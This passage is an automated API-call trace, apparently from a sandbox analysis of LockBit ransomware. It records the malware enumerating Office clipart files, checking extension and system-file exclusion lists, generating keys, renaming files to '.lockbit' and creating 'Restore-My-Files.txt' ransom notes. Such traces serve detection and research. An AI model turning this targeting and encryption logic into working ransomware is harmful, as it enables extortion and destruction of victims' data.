PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00454_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.960] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.960] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.960] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf78d7c00, ftCreationTime.dwHighDateTime=0x1bd4b30, ftLastAccessTime.dwLowDateTime=0x6a34aa30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf78d7c00, ftLastWriteTime.dwHighDateTime=0x1bd4b30, nFileSizeHigh=0x0, nFileSizeLow=0x27a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00458_.WMF", cAlternateFileName="")) returned 1 [0161.960] lstrcmpiW (lpString1=".", lpString2="NA00458_.WMF") returned -1 [0161.960] lstrcmpiW (lpString1="..", lpString2="NA00458_.WMF") returned -1 [0161.960] PathFindExtensionW (pszPath="NA00458_.WMF") returned=".WMF" [0161.960] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.960] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.960] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.960] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.960] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.960] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.960] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.961] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.962] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.962] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.962] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.962] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.962] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.962] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.962] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.962] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.962] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.962] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.962] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.962] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.962] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.962] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.962] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.962] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.962] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.962] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.963] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.963] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00458_.WMF") returned 1 [0161.963] lstrcmpiW (lpString1="ntldr", lpString2="NA00458_.WMF") returned 1 [0161.963] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00458_.WMF") returned 1 [0161.963] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00458_.WMF") returned -1 [0161.963] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00458_.WMF") returned -1 [0161.963] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00458_.WMF") returned 1 [0161.963] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00458_.WMF") returned -1 [0161.963] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.963] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00458_.WMF") returned=".WMF" [0161.963] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.963] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.963] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.963] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.963] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.963] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.963] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.963] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.963] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.963] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.963] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.964] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.964] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.964] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.964] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.964] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.964] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.964] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.964] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.964] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.964] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.964] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.964] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.964] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.964] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.964] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.964] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.964] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.964] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00458_.WMF.lockbit") returned 72 [0161.964] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00458_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00458_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.966] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.966] malloc (_Size=0x40068) returned 0x3df0008 [0161.966] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10148) returned 1 [0161.966] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.966] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.966] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.967] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.967] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.972] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00458_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00458_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.972] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.972] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0161.973] free (_Block=0x1fa2ed8) [0161.973] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00458_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.973] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.973] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.974] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe80e3300, ftCreationTime.dwHighDateTime=0x1bd4b30, ftLastAccessTime.dwLowDateTime=0x6a34aa30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe80e3300, ftLastWriteTime.dwHighDateTime=0x1bd4b30, nFileSizeHigh=0x0, nFileSizeLow=0x4f6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00462_.WMF", cAlternateFileName="")) returned 1 [0161.974] lstrcmpiW (lpString1=".", lpString2="NA00462_.WMF") returned -1 [0161.974] lstrcmpiW (lpString1="..", lpString2="NA00462_.WMF") returned -1 [0161.974] PathFindExtensionW (pszPath="NA00462_.WMF") returned=".WMF" [0161.974] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.974] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.974] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.974] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.974] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.974] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.974] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.974] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.974] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.974] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.974] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.974] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.975] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.975] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.976] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.976] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.976] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.976] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.976] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.976] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.976] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.976] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.976] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.976] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00462_.WMF") returned 1 [0161.976] lstrcmpiW (lpString1="ntldr", lpString2="NA00462_.WMF") returned 1 [0161.976] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00462_.WMF") returned 1 [0161.976] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00462_.WMF") returned -1 [0161.976] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00462_.WMF") returned -1 [0161.976] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00462_.WMF") returned 1 [0161.976] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00462_.WMF") returned -1 [0161.976] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.976] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00462_.WMF") returned=".WMF" [0161.976] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.976] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.976] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.976] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.976] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.976] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.976] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.976] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.976] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.977] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.977] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00462_.WMF.lockbit") returned 72 [0161.977] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00462_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00462_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.978] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.979] malloc (_Size=0x40068) returned 0x3df0008 [0161.979] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=20332) returned 1 [0161.979] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.979] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.979] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.980] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.980] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0161.986] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00462_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00462_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.986] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.986] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0161.986] free (_Block=0x1fa2ed8) [0161.986] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00462_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.986] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.986] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.986] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x735300, ftCreationTime.dwHighDateTime=0x1bd4b1b, ftLastAccessTime.dwLowDateTime=0x6a34aa30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x735300, ftLastWriteTime.dwHighDateTime=0x1bd4b1b, nFileSizeHigh=0x0, nFileSizeLow=0xc10, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00487_.WMF", cAlternateFileName="")) returned 1 [0161.986] lstrcmpiW (lpString1=".", lpString2="NA00487_.WMF") returned -1 [0161.986] lstrcmpiW (lpString1="..", lpString2="NA00487_.WMF") returned -1 [0161.987] PathFindExtensionW (pszPath="NA00487_.WMF") returned=".WMF" [0161.987] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.987] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.988] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.988] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00487_.WMF") returned 1 [0161.988] lstrcmpiW (lpString1="ntldr", lpString2="NA00487_.WMF") returned 1 [0161.988] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00487_.WMF") returned 1 [0161.988] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00487_.WMF") returned -1 [0161.988] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00487_.WMF") returned -1 [0161.989] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00487_.WMF") returned 1 [0161.989] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00487_.WMF") returned -1 [0161.989] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.989] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00487_.WMF") returned=".WMF" [0161.990] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.990] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 